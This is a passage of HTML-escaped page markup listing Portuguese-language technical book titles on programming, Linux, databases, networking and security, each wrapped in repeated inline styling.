letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Como Quebrar Códigos&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Core J2ME e Tecnologia MIDP&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Core Java (Volume 01)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Criptografia e Segurança de Redes (4ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Delphi 8 Para Plataforma .NET - Curso Completo&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Dominando Linux Firewall IPTables&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Dossiê V1RU5&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Eletrônica Analógica - Amplificadores Operacionais e Filtros Ativos (6ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Engenharia de Software (6ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Escrevendo Código Seguro (6ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Estruturas de Dados e Algoritmos em Java (4ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Estrutura de Dados&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Fundamentos de Desenho Orientado a Objetos com UML&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Guia do Desenvolvedor de Delphi .NET&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Hacker Inside (Volume 01)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Hacker Inside (Volume 02)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Hardware Curso Completo (4ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Java - Como Programar (8ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Linux - O Guia Essencial (5ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Linux O Guia Prático - Redes e Servidores&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Linux, Entendendo o Sistema&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Lógica de Programação (3ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Lógica de Programação e Estruturas de Dados&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Manual Completo do Linux (2ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Manal Completo do Linux - Guia do Administrador&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Matlab (2ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Mecânica dos Fluídos (2ª Edição Revisada)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Métodos Quantitativos&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Microcontroladores 8051&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Microsoft SQL Server 2005 - Fundamentos de Banco de Dados&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Microsoft SQL Server 2005 - Técnicas Aplicadas&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Microsoft SQL Server 2005&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Padrões de Projeto&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Pesquisa Operacional (8ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- PHP - Programando com Orientação a Objetos&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Programação Orientada a Objetos com Java&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Programando C/C++ - A Bíblia&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Projeto de Algoritmos e Fundamentos - Análise e Exemplos da Internet&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Projeto de Banco de Dados (4ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Projeto de Interconexão de Redes&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Rede de Computadores (4ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Redes de Computadores e a Internet (5ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Redes Neurais (2ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Sistema de Banco de Dados&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Sistemas Digitais (10ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Sistemas Modernos de Comunicações Wireless&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Sistemas Operacionais - Projeto e Implementação (2ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Sistemas Operacionais Modernos (3ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Sistemas Telefônicos&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- SOA - Princípios de Design de Serviços&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Treinamento em Linguagem C++ (Módulo 01)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Treinamento em Linguagem C++ (Módulo 02)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- UML e C++&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; 